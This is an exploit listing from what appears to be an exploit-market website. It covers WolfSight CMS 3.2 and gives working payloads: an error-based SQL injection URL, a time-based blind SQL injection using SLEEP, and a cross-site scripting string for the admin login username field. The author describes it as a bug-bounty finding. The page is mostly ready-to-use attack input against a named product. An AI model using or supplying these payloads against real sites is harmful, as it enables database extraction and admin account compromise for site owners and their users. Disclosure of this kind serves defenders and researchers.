[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WolfSight CMS 3.2 - SQL Injection Vulnerability

Author
Berk Dusunur
Risk
[
Security Risk High
]
0day-ID
0day-ID-30693
Category
web applications
Date add
10-07-2018
Platform
php
# Exploit Title: WolfSight CMS 3.2 - SQL Injection
# Exploit Author: Berk Dusunur & Zehra Karabiber
# Vendor Homepage: http://www.wolfsight.com
# Software Link: http://www.wolfsight.com
# Version: v3.2
# Tested on: Parrot OS / WinApp Server
# CVE : N/A
 
# PoC Sql Injection
# Parameter: #1* (URI)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: 
 
http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn
 
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: 
 
http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx
 
# PoC Cross-Site Scripting
# http://ip/admin/login.php
# Username
 
<IMG SRC=”javascript:alert(‘EZK’);”>
 
# This vulnerability was identified during bug bounty

#  0day.today [2024-11-14]  #